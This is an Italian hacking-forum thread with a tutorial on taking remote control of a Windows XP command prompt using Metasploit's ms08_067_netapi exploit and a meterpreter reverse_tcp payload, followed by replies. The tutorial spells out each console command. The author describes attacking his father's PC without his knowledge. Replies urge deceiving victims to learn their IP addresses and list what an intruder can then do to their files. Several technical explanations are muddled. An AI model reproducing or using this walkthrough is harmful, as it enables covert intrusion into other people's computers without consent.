• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!
Ho letto un paio di volte la teoria...
Mo leggo un paio di volte questa e poi provo.
OT : Comunque in ogni guida ch'è qualcuno che critica o che offende veramente a ... sbafo xD
Senza nessun senso e solo per lo sfizio di creare disordine .
Tutta questione di invidia.
diciamo che nessuno di noi avrebbe mai scritto tutto sto casino per dei poveri LAMER, che vedendo queste guide non fanno altro che provare un'orgasmo .
Pochi apprezzeranno sta guida e la useranno non solo per creare casino.
Pochi riusciranno ad usare questo framework ( spero di si. almeno io >.< ).
Scusate il casino, ma mi sentivo messo in causa.
Ps : Ancora grazie :emoji_slight_smile:
 
2dc8g78.png

Dopo aver parlato di Metasploit Framework in generale, e della console in questo Topic : Metasploit Framework ho deciso di applicare la pratica. Perchè noi sappiamo la teoria, anzi, si SUPPONE che sappiamo la teoria ( almeno io la so ), ma se sappiamo la teoria che cosa ce ne facciamo se non la applichiamo ? Nulla. Per questo oggi mi trovo qui a scrivere questa guida su come Ottenere il controllo Remoto del CMD tramite Metasploit. E noi andremo a fare proprio questo, invieremo una richiesta ( input ) REMOTA al PC che andremo ad attaccare, e da esso riceveremo una risposta ( output ). Ma forse è meglio se andiamo alla pratica :

In questo momento sono con Windows 7, e poichè Metasploit lavora solo ed esclusivamente sulle architetture Microsoft Windows XP, ho deciso di fare questo esperimento sul PC di mio padre, che ha Windows XP Professional SP2. Chiaramente lui non vedrà niente, cioè non si accorgerà di quello che sto facendo, o che viene fatto, perchè è tutto uno scambio di dati tra macchine ( in questo caso tra il mio PC e il suo ), e non si visualizza niente sullo schermo.

Basta parlare, andiamo ai fatti :

Iniziamo con lo scaricare Metasploit Framework dal seguente sito :
Perfavore, Entra oppure Registrati per vedere i Link!
, scegliete in base a quale OS usate ( tranne il Mac OS X ) il Download appropriato, quindi dopo averlo scaricato, installatelo. Dopo che lo installate riavviate il PC ( per sicurezza ), successivamente aprite la console con privilegi Amministratore : Tasto destro su Metasploit Update > Esegui come Amministratore, vi aggiornerà la Msfconsole con gli ultimi Exploit rilasciati come Update della console. Ci starà un po' a caricare, ma voi abbiate la pazienza di aspettare ;)

Adesso che avete aggiornato la vostra bellissima e figosa console, apritela, vi verrà fuori questo :

2mhzy94.png


Ps : Per questioni di spazio ho rimpicciolito la finestra, sennò la pagina di questa guida sarebbe lunga.

Adesso, per chi ha seguito precedentemente il primo link che ho messo all'inizio della discussione, cioè su come usare la console di Metasploit, saprà già cosa fare, ma non saprà come. Il COSA è quello di andare a "scegliere" l'Exploit che fa al caso nostro, il COME lo vedrete mentre che leggete. Quindi, aperta la console di Metasploit, dobbiamo settare l'Exploit che ci permette di ottenere il controllo remoto della macchina che andremo ad attaccare, quindi scriviamo nella console : use windows/smb/ms08_067_netapi

huoo52.png


Adesso dobbiamo andare a settare il modulo che ci permette di apliare le funzionalità dell'Exploit che abbiamo settato sopra. Potremmo già utilizzarlo così, ma non potremmo prendere il controllo del CMD della macchin attaccata, potremmo solo VEDERLO, ma a noi questo non ci interessa, quindi andiamo a settare il PAYLOAD, in questo modo :
set PAYLOAD windows/meterpreter/reverse_tcp

1193qs2.png


Ed ecco qui che avremo il nostro bel modulo, ovvero il METERPRETER, che ci permetterà di assumere il controllo del CMD. Adesso però dobbiamo settare l'IP ( Internet Protocol ), perchè voi dovete considerare Metasploit come una specie di persona, quindi dovrete dire a Metasploit QUALE pc attaccare, perchè di Computer non c'è mica solo il vostro, quindi dovete settare l'IP Gateway ( non il DNS, attenzione !! ), in questo modo : set RHOST 192.168.0.1

2pyue1i.png


Adesso invece dobbiamo settare l'IP Gateway del Computer "attaccante" ( che non gioca a calcio eh LòL ), cioè voi, in questo modo : set LHOST 192.168.1.1

21x5oh.png


Attenzione!! Quando voi settate l'RHOST ( Remote Host ) e il LHOST ( Local Host ), dovete mettere quelli che interessano a voi, ovvero, nel LHOST andrete a mettere il VOSTRO IP Gateway, nell'RHOST andrete a mettere l'IP Gateway del PC che volete attaccare, spero sia chiaro.

Adesso però dobbiamo settare che TIPOLOGIA di Sistema Operativo usa il PC che volete attaccare. Come ho detto prima, Metasploit funziona solo con i Windows XP, dal SP1 al SP3, quindi dobbiamo settare quale Sistema Operativo usa la macchina Remota, e per farlo dobbiamo visualizzare le TARGET, in questo modo : show targets

2cx6o0l.png


Chiaramente a voi ve ne spunteranno molti di più, io per questioni di spazio ho rimpicciolito la Screen, sennò sarebbe stata lunga. Adesso dovete anche sapere il SP ( Service Pack ) della macchina che volete attaccare, e questo potete trovarlo usando il Social Engineering, lo stesso discorso vale per l'IP Gateway. Insomma, dovete trovare un modo per farvi dare, o per TROVARE voi il SP e l'IP Gateway. Il SP del PC di mio padre come detto sopra è il SP2, ed è in lingua italiana, quindi devo settare il TARGET per quel Service Pack ( notare che go evidenziato anche la parte che mi interessa nella screen sopra ), quindi lo andremo a settare così : set targets 25

33nkw3r.png


Adesso non ci resta che lanciare l'Exploit, con il semplice comando : exploit

24lmtg7.png


Subito dopo che avrete eseguito il comando "exploit" vi apparirà una bellissima finestra del CMD del PC remoto, ecco un esempio :

ip8m4w.png


Mentre invece il mio Prompt dei comandi è questo :

25015iw.png


Il Tutorial è finito.

Fonte : Mia

Saluti, System32

io dopo aver fatto tutto , con prova il mio amico
alla fine è uscito questo [ sto su ubuntu ]
[-] Handler failed to bind to 192.168.1.1:4444
[*] Started reverse handler on 0.0.0.0:4444
[-] Exploit failed: The connection timed out (192.168.0.1:445).
[*] Exploit completed, but no session was created.

:emoji_slight_frown:
ci ho messo un bel pò di tempo xDD
vabbè riptrovo
 
io dopo aver fatto tutto , con prova il mio amico
alla fine è uscito questo [ sto su ubuntu ]
[-] Handler failed to bind to 192.168.1.1:4444
[*] Started reverse handler on 0.0.0.0:4444
[-] Exploit failed: The connection timed out (192.168.0.1:445).
[*] Exploit completed, but no session was created.

:emoji_slight_frown:
ci ho messo un bel pò di tempo xDD
vabbè riptrovo

Dubito che l'ip della vittima sia 192.168.0.1...
 
io dopo aver fatto tutto , con prova il mio amico
alla fine è uscito questo [ sto su ubuntu ]
[-] Handler failed to bind to 192.168.1.1:4444
[*] Started reverse handler on 0.0.0.0:4444
[-] Exploit failed: The connection timed out (192.168.0.1:445).
[*] Exploit completed, but no session was created.

:emoji_slight_frown:
ci ho messo un bel pò di tempo xDD
vabbè riptrovo

Non c'era bisogno di quotare tutta la guida. ::emoji_relieved: Comunque, se leggessi bene, nella guida ho messo CHIARAMENTE che l'IP della vittima deve essere quello che hai tu, cioè, devi prendere l'IP Gateway del PC che vuoi attaccare, non devi mettere quello che ho messo io...Io ho messo quello perchè era quello del PC di mio padre, perchè la prova l'ho fatto su quello. Ma tu devi mettere quello che interessa a te...
 
Non c'era bisogno di quotare tutta la guida. ::emoji_relieved: Comunque, se leggessi bene, nella guida ho messo CHIARAMENTE che l'IP della vittima deve essere quello che hai tu, cioè, devi prendere l'IP Gateway del PC che vuoi attaccare, non devi mettere quello che ho messo io...Io ho messo quello perchè era quello del PC di mio padre, perchè la prova l'ho fatto su quello. Ma tu devi mettere quello che interessa a te...

ho ciesto al mio amico quale fosse il suo ip e lui mi ha dato quella che hai messo anche tu O_O
sai dirmi dove procurarmelo ?
su queste cose , non ho tanto esperienza...
 
ho ciesto al mio amico quale fosse il suo ip e lui mi ha dato quella che hai messo anche tu O_O
sai dirmi dove procurarmelo ?
su queste cose , non ho tanto esperienza...

Devi usare un po' di Social. Non puoi chiederglielo direttamente. ::emoji_relieved:
 
Comunque aggiungi la fonte sui codici poichè sulla vecchia guida che hai messo su metasploit hai indicato questo link come fonte
Perfavore, Entra oppure Registrati per vedere i Link!
e sotto la spiegazione del programma c'è la stessa guida che hai postato tu solo con parole diverse
 
Comunque aggiungi la fonte sui codici poichè sulla vecchia guida che hai messo su metasploit hai indicato questo link come fonte
Perfavore, Entra oppure Registrati per vedere i Link!
e sotto la spiegazione del programma c'è la stessa guida che hai postato tu solo con parole diverse

La fonte sui codici ?

La guida è interamente mia, non l'ho copiata da nessuna parte. Conoscevo i comandi da quando è nato Metasploit ._. Non c'è bisogno di inserire la guida, sono stato più di 1 ora e mezza a scrivere la guida, non vedo perchè dovrei inserire quel link che tu mi hai dato, che oltre tutto non c'entra nulla con quello che ho postato io. L'esempio che c'è sotto è l'Exploit per sfruttare la porta 135 aperta nei Computer, non c'entra nulla con il ms_08_netapi.
 
Ciao System. Volevo chiederti un po' di info su questo exploit. Funziona su tutte le macchine Windows? E' in reverse quindi devo avere le porte aperte? Come LHOST devo impostare il mio IP locale o quello esterno? E su RHOST quello esterno della vittima?
 
Ciao System. Volevo chiederti un po' di info su questo exploit. Funziona su tutte le macchine Windows? E' in reverse quindi devo avere le porte aperte? Come LHOST devo impostare il mio IP locale o quello esterno? E su RHOST quello esterno della vittima?

Gli Exploit ( come ho scritto in qualche post precedente ) funziona solo ed esclusivamente su Windows XP non patchato. Per quanto riguarda le porte, tu non devi avere aperto nulla, però la vittima sì. Ma non è una Reverse Connection. Non è mica è un BackDoor. In LHOST devi mettere il tuo Gateway, in RHOST il Gateway della vittima

Bella guida dettagliata e scritta bene ;)

Grazie :emoji_slight_smile:
 
Riferimento: Ottenere il controllo Remoto del CMD con Metasploit Framework

raga ma una volta aperto il suo pormp? con il prompt non si può fare molto.....
 
Riferimento: Ottenere il controllo Remoto del CMD con Metasploit Framework

raga ma una volta aperto il suo pormp? con il prompt non si può fare molto.....

Non è vero, ad esempio puoi aprire i files che ti interessa guardare, vedere le cartelle dell'utente, cancellare/disinstallare programmi e tanto altro.
 
Riferimento: Ottenere il controllo Remoto del CMD con Metasploit Framework

Ed anche Upload/Download di file. Ti sembra poco? :emoji_slight_smile:
 
Riferimento: Ottenere il controllo Remoto del CMD con Metasploit Framework

tutto bene ma alla fine mi dice sessione no creata??????ovviamente in inglese.....
ok penso di aver sbagliato devo usare ip gateway..
ma come mo lo procuro quello della vittima???????
 
Ultima modifica:
Riferimento: Ottenere il controllo Remoto del CMD con Metasploit Framework

tutto bene ma alla fine mi dice sessione no creata??????ovviamente in inglese.....
ok penso di aver sbagliato devo usare ip gateway..
ma come mo lo procuro quello della vittima???????
Mai pensato a leggere qualche guida su come creare file che rubano l'indirizzo IP?
Te ne dico una io velocemente, allora, se la vittima ha MSN con MSN Plus installato, digli di digitare questo:
!IP
E vedrai che comparirà il suo IP, testato personalmente e funziona al 100% patpat​